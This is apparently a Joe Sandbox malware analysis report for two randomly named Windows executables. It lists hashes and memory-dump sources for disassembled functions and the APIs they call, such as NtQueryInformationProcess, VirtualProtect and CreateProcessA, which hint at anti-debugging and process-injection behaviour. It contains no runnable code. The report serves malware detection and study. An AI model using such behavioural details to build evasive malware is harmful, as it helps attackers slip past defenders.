Opcode ID: 4417993d3aae1b1b4b655ab726905bfdb8811acf7eaa5cf8d604d2e7950150f4
Instruction ID: f3741d95729e06cc821327005ded084a9dd73686df09213f2bf086dc2b195954
Opcode Fuzzy Hash: 4417993d3aae1b1b4b655ab726905bfdb8811acf7eaa5cf8d604d2e7950150f4
Instruction Fuzzy Hash: 2131E770E11619CBDB19CF6AC9416AEBBF7BFC9300F14C16A9508E7214DB3059818F61

Function 008108D1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb6c0bddcf359cd7226790a55706320cf957ca0744870d4dded6829d2dd81a2
Instruction ID: da0e24de9f89e431c12218f094f7b6a852b3a2269455176db41e2a73d8b38e7d
Opcode Fuzzy Hash: 6fb6c0bddcf359cd7226790a55706320cf957ca0744870d4dded6829d2dd81a2
Instruction Fuzzy Hash: 3721F771E046189BEB08CF6B9C006DEFAF7BFC9300F14C07AD918AA264EB3415868F55

Analysis Process: nzLoHpgAln.exePID: 7312, Parent PID: 6176COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	1

Executed Functions

Function 067175E8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067174A6), ref: 06717656

Memory Dump Source

Source File: 00000008.00000002.1877103834.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6710000_nzLoHpgAln.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0b3b69045a4dd0b136c056e23b232f4f25d641ce5091a86cc96916dea2412055
Instruction ID: 74d49f571b2ba9796e92a13cd640df0a7f7aace6546e08f99f827f7020b0f8c1
Opcode Fuzzy Hash: 0b3b69045a4dd0b136c056e23b232f4f25d641ce5091a86cc96916dea2412055
Instruction Fuzzy Hash: 4F1100B5C002498FCB14DF9AC844A9EFBF4EF88320F10842AD469A7710D374A546CFA5

Function 06717148 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067174A6), ref: 06717656

Memory Dump Source

Source File: 00000008.00000002.1877103834.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6710000_nzLoHpgAln.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0cd30331944106a5790055703bd76a9c8348f44cec73e2b01e77fb34003867ed
Instruction ID: 9e65879e2f4c9133f45dd0592b52038f83587f7100e917b93edb5dfa5d71c7b4
Opcode Fuzzy Hash: 0cd30331944106a5790055703bd76a9c8348f44cec73e2b01e77fb34003867ed
Instruction Fuzzy Hash: 241112B5C003498FCB14DF9AC844A9EFBF4EB88210F14842AD429A7300D375A545CFA5

Function 02BE0CE0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32(?,?,?,?,?,?,?,?,?,?,A6581002), ref: 02BE0D47

Memory Dump Source

Source File: 00000008.00000002.1859097556.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2be0000_nzLoHpgAln.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 1bb9a76f7cc531397a167153eb104dac23aa278d0ecd6c653030a014dcc73765
Instruction ID: cdfbbe5a9eadab580a417e66fe7c9d7802fc47d51947aa2ecaa71c9e4c028024
Opcode Fuzzy Hash: 1bb9a76f7cc531397a167153eb104dac23aa278d0ecd6c653030a014dcc73765
Instruction Fuzzy Hash: A111F5B5D002498FCB24DFAAC4457EEFFF5EB88324F248859C45AA7240CB79A945CF94

Function 02BE0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32(?,?,?,?,?,?,?,?,?,?,A6581002), ref: 02BE0D47

Memory Dump Source

Source File: 00000008.00000002.1859097556.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2be0000_nzLoHpgAln.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 10117d058e2aa16f460c1b7b0336c77d638fb33fa0720322753ce343e9115825
Instruction ID: 7f7e5609ae003c022ae2de41f787228e83a8a45b889d61226a7b805ca9710639
Opcode Fuzzy Hash: 10117d058e2aa16f460c1b7b0336c77d638fb33fa0720322753ce343e9115825
Instruction Fuzzy Hash: EB1106B59003498FCB24DFAAC4457DFFFF5EB88324F208859C55AA7240CB79A544CBA5

Function 06761550 Relevance: 1.4, Instructions: 1412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca5857b731d0e4a1e964c9f417e229fdf7167848c134b9a05ea7864416d46d69
Instruction ID: ea0e23ea0a4dca1941747dcb43af3c601d65460dcfc9139366db7214ce7afb32
Opcode Fuzzy Hash: ca5857b731d0e4a1e964c9f417e229fdf7167848c134b9a05ea7864416d46d69
Instruction Fuzzy Hash: E0C24E74B002189FDB54CF58C895EADBBB6FF89704F908095E609AB3A1DB31AD41CF91

Function 0676349D Relevance: 1.3, Instructions: 1277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 169be66f560d1ec2b5fd2a42caae7b88cce71d791d25377a3f953ceff8f80af8
Instruction ID: d7bbfa17fcd9a2ba40365003d2d03b3a51e63e91e96dc017b3c038e34391da4c
Opcode Fuzzy Hash: 169be66f560d1ec2b5fd2a42caae7b88cce71d791d25377a3f953ceff8f80af8
Instruction Fuzzy Hash: E6A1E374B002459FCB44DB79C894A7EBBF6EF89710B1494AAEA16DB3A1CB34DC01CB51

Function 06760048 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05fda0a985083fe323e0e93d1b77991b6b3a3588305dc1fbf037c7af253d4755
Instruction ID: bb97d92f8b9d06ec8ec54d9ddeccb6556017e8dc24bb20a7210c9fb37d920036
Opcode Fuzzy Hash: 05fda0a985083fe323e0e93d1b77991b6b3a3588305dc1fbf037c7af253d4755
Instruction Fuzzy Hash: 57426970B106258FCB64AF78D550A6EBBF2FFC5706B408A4CD5079B395CBB5AC058B82

Function 067604F4 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6f05f31c27823fa747d919f3990326bf84e195bfcd8e17dc7adfd31d3709cc
Instruction ID: 6ed9822320cc2b7abe734e4f273695a2b157e57546010a35227c0b0507d7a733
Opcode Fuzzy Hash: fe6f05f31c27823fa747d919f3990326bf84e195bfcd8e17dc7adfd31d3709cc
Instruction Fuzzy Hash: CA128A70B006258FCB24DF68D950A7EBBF6FF85705F408948E9029B391CBB6ED058B81

Function 0676056A Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67fa73f309eec310b406c5e915af5c5fac248b6702bda090eacaa56068cc3c17
Instruction ID: a5e7d27a2a48ad7fd2d2a4289d4fae166256abef88277c4a414df0decc267ac0
Opcode Fuzzy Hash: 67fa73f309eec310b406c5e915af5c5fac248b6702bda090eacaa56068cc3c17
Instruction Fuzzy Hash: 25029870B102259FDB14DF68D950A7EBBF6FF85705F408948E9029B3A1CBB6ED058B81

Function 067605E0 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8db966e04b148fbe6c689e0402f0038975515f355525388974929f9818e8e2d
Instruction ID: 8935d5c1817c520e2b65ffaae230861ca0dc9bb86f8e4e99a2fef7caac56870f
Opcode Fuzzy Hash: b8db966e04b148fbe6c689e0402f0038975515f355525388974929f9818e8e2d
Instruction Fuzzy Hash: 80029730B002149FDB14DF68C954A7EBBF6FF85705F408948E9029B3A2CBB6EC058B81

Function 06760656 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd75f3b8ba24b92ee612cb15f0976feaef933051996515c64bd1349b90ab7fc
Instruction ID: d71e23813af9b7e33e301f921d60a37dd806b800a98a103c73561271ed44ef4b
Opcode Fuzzy Hash: 4cd75f3b8ba24b92ee612cb15f0976feaef933051996515c64bd1349b90ab7fc
Instruction Fuzzy Hash: C1F19770B102149FDB10DF68C955A7EBBB6FF85705F008849E9029F3A2CBB6ED058B91

Function 067606CC Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2acd5100ffbc03dc65908534a1a00782eb6b8c0e757e9b3faf3efdd4af4c017
Instruction ID: 817acb73d5c901cc965889a18537ea3711e3e4ab4c986a50ed2462f01472bbc7
Opcode Fuzzy Hash: b2acd5100ffbc03dc65908534a1a00782eb6b8c0e757e9b3faf3efdd4af4c017
Instruction Fuzzy Hash: 74E19970B102149FDB00DF69C955A7EBBB6FF85704F008449EA029F3A2CBB6ED458B91

Function 06760013 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 300b1d83ab67db4cf487f1406455752aa426a8b3035efd612b034ef4daf27d11
Instruction ID: 24210a8bb325cbe356bae64b1fa616df5744efa7a16afd233d6c27ecae0d7aa2
Opcode Fuzzy Hash: 300b1d83ab67db4cf487f1406455752aa426a8b3035efd612b034ef4daf27d11
Instruction Fuzzy Hash: 57D1AA30B102449FDB01DF69C955B7A7BB6BF89704F148096EA019F3A6DBB1DC05CB91

Function 0676154D Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3d45ece671dfa2775e2fc70972a26efbe44b6d44eb8a36b08f014c0c00f85d
Instruction ID: 04e22bdf03912c9802ebf082265f5be216ba2a06b482353595eaef2711190270
Opcode Fuzzy Hash: 8a3d45ece671dfa2775e2fc70972a26efbe44b6d44eb8a36b08f014c0c00f85d
Instruction Fuzzy Hash: C5C10675B00204AFCB04DF98C989EADBBB6FF89704B918055FA059B7A5CB72EC04CB51

Function 06761308 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5cd163050545891c60ae70b129c24026fb4236e68f5106e8cd6d83c49329250
Instruction ID: 23461f4e52f2a4c4165db55db58e47248dbfd48c0d0de95ab3679c187534f974
Opcode Fuzzy Hash: d5cd163050545891c60ae70b129c24026fb4236e68f5106e8cd6d83c49329250
Instruction Fuzzy Hash: CF61F231B003158FCB55AF7FD84857ABBE6AFC6211B58896AED06CB611EB31C844C7A1

Function 067612E8 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f4e7b57cabc4b6b9f4ade669b4288bcedfbbda402d97fe3d486d2a6d880034
Instruction ID: e5af95380b049779e6b85c42781d1eaa4b2f1bb34c83bfaea55ee5256fc42b48
Opcode Fuzzy Hash: c5f4e7b57cabc4b6b9f4ade669b4288bcedfbbda402d97fe3d486d2a6d880034
Instruction Fuzzy Hash: 0C21B531E043809FC7558F3F88885757FA6AF8265075D44A6EC06CF662DB34CC49C7A1

Function 0676338B Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fccdbfdfb483f0faff0140d0b26faf069c5bcdb61ef19e272289c6118b5c86e
Instruction ID: 0aa9039cf0eea7956da508e846f4f5d418f04b21a2d7e28359150b8418425679
Opcode Fuzzy Hash: 6fccdbfdfb483f0faff0140d0b26faf069c5bcdb61ef19e272289c6118b5c86e
Instruction Fuzzy Hash: 9A215C75B001049FCB54CF69C894EA9BBB2EF88724F1184A5FD099F362DA31ED05CB50

Function 011AD054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1858481966.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_11ad000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f09d4077162ec9bd07c4d23d50c2ae1abd75b9cf3edbac080eec7dd8ad01d5
Instruction ID: f6deec3f704a2fe9193595ec7a106d7aeba9acbdf02275acceb128ff1dcd5521
Opcode Fuzzy Hash: f7f09d4077162ec9bd07c4d23d50c2ae1abd75b9cf3edbac080eec7dd8ad01d5
Instruction Fuzzy Hash: 1F214BB9500700DFCF09DF54E9C0B16BFA5FB88314F64C668E9090B646C336D416CB62

Function 02A6D4A4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1858587505.0000000002A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a6d000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d612f67f02c21439085d86564f5313f81b722e651ee39f25c9f9b31a583f5b
Instruction ID: e94ac4ee21e6cc64c109c19bcb98157c95576244231906fb60b59dbeda0d9c6f
Opcode Fuzzy Hash: 68d612f67f02c21439085d86564f5313f81b722e651ee39f25c9f9b31a583f5b
Instruction Fuzzy Hash: D621F5B1604604EFDB05DF14D5C8B35BBA5FB84358F24C96DD90A4B652CB36D806CA61

Function 02A6D2F4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1858587505.0000000002A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a6d000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c14134d978b313a53b91d1c89c0b7f7050c0b8d95ef26ada17dc550d69dc4406
Instruction ID: 9f8b8c63f045b144fcc404a8d1eea19e8dab9205a1f67aa9fcff8545c728a3a3
Opcode Fuzzy Hash: c14134d978b313a53b91d1c89c0b7f7050c0b8d95ef26ada17dc550d69dc4406
Instruction Fuzzy Hash: C421F9B5704644DFDB01DF14D9C8B3ABB65FB84364F28C5A9D8094B345C73AD406C6A1

Function 011AD04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1858481966.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_11ad000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e589ff89d53fefa928555ed391731ad88d74b974b24a20ba51987b010bfd2c
Instruction ID: 851d29bdbe93595d9e3e881ad3b82eac75f1bad6fb1a0613b8b2b4054b1dd329
Opcode Fuzzy Hash: 85e589ff89d53fefa928555ed391731ad88d74b974b24a20ba51987b010bfd2c
Instruction Fuzzy Hash: 9121C076504280DFCF06CF54D9C4B16BF72FB88324F24C6A9D9490A656C33AD416CB91

Function 02A6D2EF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1858587505.0000000002A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a6d000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
Instruction ID: ab8b911c9388b3c144bb02963bdc9ee2ce71bd30a337651dca0f7a3d92f17934
Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
Instruction Fuzzy Hash: 6711C475604680CFDB11CF14D5C8B29FF71FB84324F28C6AAD8494B656C33AD40ACBA1

Function 02A6D49F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1858587505.0000000002A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a6d000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 4bc46dcbdf49aefcf191b2c1e2f418896bb78a3b58df1e780cb6ace4c0c1aa38
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: E011D075604640CFCB02CF14C5C8B25BF71FB84318F24C6ADD9494B692C33AD40ACB51

Function 011ADAF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1858481966.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_11ad000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9076dd89512c17f04a3b3f7893b3e7271ad0b234d5714e9c75d797876ab6583
Instruction ID: fa2d71a54575e54e50be0e31db1527e4990bfa4ef651803e590f64be6471307e
Opcode Fuzzy Hash: c9076dd89512c17f04a3b3f7893b3e7271ad0b234d5714e9c75d797876ab6583
Instruction Fuzzy Hash: F1012B75104B40DAEF188AA9ECC4B67FFE8DF52321F48C41AED0D0B682C7399840C671

Function 011ADAF8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1858481966.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_11ad000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ef24e6a9d1d0431116e924c8822a77b6df473c495ebec5b443fe09b144510e
Instruction ID: db44463ebb524c2a6e849f623fac2a2ce156811122cac2706fae16c05da326b0
Opcode Fuzzy Hash: 06ef24e6a9d1d0431116e924c8822a77b6df473c495ebec5b443fe09b144510e
Instruction Fuzzy Hash: 40F0F6310047409EEB248E5AEC84B63FFE8EF41734F18C05AED0D0B686C3799844CAB0

Non-executed Functions

Function 06760D50 Relevance: 10.3, Strings: 8, Instructions: 298COMMON

Download Yara Rule

Strings

$^q, xrefs: 06760DCC
$^q, xrefs: 06760F82
$^q, xrefs: 06760F00
$^q, xrefs: 06760F50
$^q, xrefs: 06760F76
$^q, xrefs: 06760E1C
$^q, xrefs: 06760E4E
$^q, xrefs: 06760E42

Memory Dump Source

Source File: 00000008.00000002.1877200555.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 9448bac3a5e47aac9e9ef0ed064dc3a0d5d65876d4f882ecdea4255e1e715470
Instruction ID: 33e3878c3842e09c4ef5c8aef04e84bc6ddce42da5da072462460f84dd1eb9bc
Opcode Fuzzy Hash: 9448bac3a5e47aac9e9ef0ed064dc3a0d5d65876d4f882ecdea4255e1e715470
Instruction Fuzzy Hash: ADB1E434B002558FDF55DB6ACA589BEBBF6BF89300B14845AE806DB3A5DB34DC01CB90

Analysis Process: wZWwzQVEakJvEU.exePID: 7408, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	265
Total number of Limit Nodes:	12

Executed Functions

Function 00FB07D4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00FB98BD

Strings

$H, xrefs: 00FB07D4

Memory Dump Source

Source File: 0000000A.00000002.1848373717.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fb0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: InformationProcessQuery
String ID: $H
API String ID: 1778838933-3639665872
Opcode ID: ffff9de4a1d901d67e0471fcddfff810d888412aaaba093dee9e0f22e9676be7
Instruction ID: 766e3fc799f96abf3b29e578a10392dc9c0d49d2e03569e9b05fac1bc2500804
Opcode Fuzzy Hash: ffff9de4a1d901d67e0471fcddfff810d888412aaaba093dee9e0f22e9676be7
Instruction Fuzzy Hash: 584178B9D042589FCF10CFAAD984ADEFBB1BB09310F20A02AE914B7310D375A945CF64

Function 00FB9914 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNELBASE(?), ref: 00FBF2C2

Strings

$F, xrefs: 00FB9914

Memory Dump Source

Source File: 0000000A.00000002.1848373717.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fb0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: DebugOutputString
String ID: $F
API String ID: 1166629820-942642147
Opcode ID: 4823d0979f8719c363c4994effcb689468b8916f46d3aacbf6da0f4c60ab9844
Instruction ID: baf4af5ef5ed34fcbdc0781c2d904ac64945e3ef4cbc9d97b530dc339271f467
Opcode Fuzzy Hash: 4823d0979f8719c363c4994effcb689468b8916f46d3aacbf6da0f4c60ab9844
Instruction Fuzzy Hash: 4A31BCB8D002489FCB14CFAAD984ADEFBF1EB49310F14906AE818B7360D774A945CF64

Function 00FB82F9 Relevance: 1.9, APIs: 1, Instructions: 420
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00FB864F

Memory Dump Source

Source File: 0000000A.00000002.1848373717.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fb0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d07612158d33ee53e1c072260e51ef36a0ec6161d66e1c28d68d82f9cc168e97
Instruction ID: 392901996c6d636948107e28f6f5aa15253822aa2bb59623cbe40864061d5d21
Opcode Fuzzy Hash: d07612158d33ee53e1c072260e51ef36a0ec6161d66e1c28d68d82f9cc168e97
Instruction Fuzzy Hash: A1D1AD6692D3C58FEB17CB7188F6589BFA5EE52250B1C85EFC0C857193D521940BEF02

Function 0A04767C Relevance: 1.8, APIs: 1, Instructions: 328
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A04794F

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 27ecfd9eda4bfa508fab9d5be8ad948c562c6061785c9f2dfb5e199208b66991
Instruction ID: 1c22ac0027be086065f66638d3bd497d4ff9fb5485aa4a303c6e9675e62821c8
Opcode Fuzzy Hash: 27ecfd9eda4bfa508fab9d5be8ad948c562c6061785c9f2dfb5e199208b66991
Instruction Fuzzy Hash: D3C113B0D0022D8FDB24CFA8C845BEEBBB1BF49304F0095A9D849B7250DB749A85CF95

Function 0A047688 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A04794F

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 21f4a40885dc98f44e7c5e70951663d47c58ee5f742a2ea5599bd935c462110d
Instruction ID: ac5a2e8691e02344eaa389fa773468a49875879ff77170f9b16354866d068a2e
Opcode Fuzzy Hash: 21f4a40885dc98f44e7c5e70951663d47c58ee5f742a2ea5599bd935c462110d
Instruction Fuzzy Hash: 1CC103B0D0022D8FDB24DFA8C845BEEBBB1BF49304F0095A9D859B7250DB749A85CF95

Function 09D22A40 Relevance: 1.6, APIs: 1, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 09D22B53

Memory Dump Source

Source File: 0000000A.00000002.1857375276.0000000009D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9d20000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 491e686cf04f2a4a12aa058a3ef183539d2cde420c13ab7a0669d9d5a3c5eb99
Instruction ID: 0c55b552406199c84d2ce0873ec014aeac9092d3902f1f4d167bfd2cc8b79a5f
Opcode Fuzzy Hash: 491e686cf04f2a4a12aa058a3ef183539d2cde420c13ab7a0669d9d5a3c5eb99
Instruction Fuzzy Hash: 9651ECB5D042589FCF01CFA9D844AAEBFF1EB1A310F14906AE914BB221D335A951DF64

Function 00FBDDFC Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

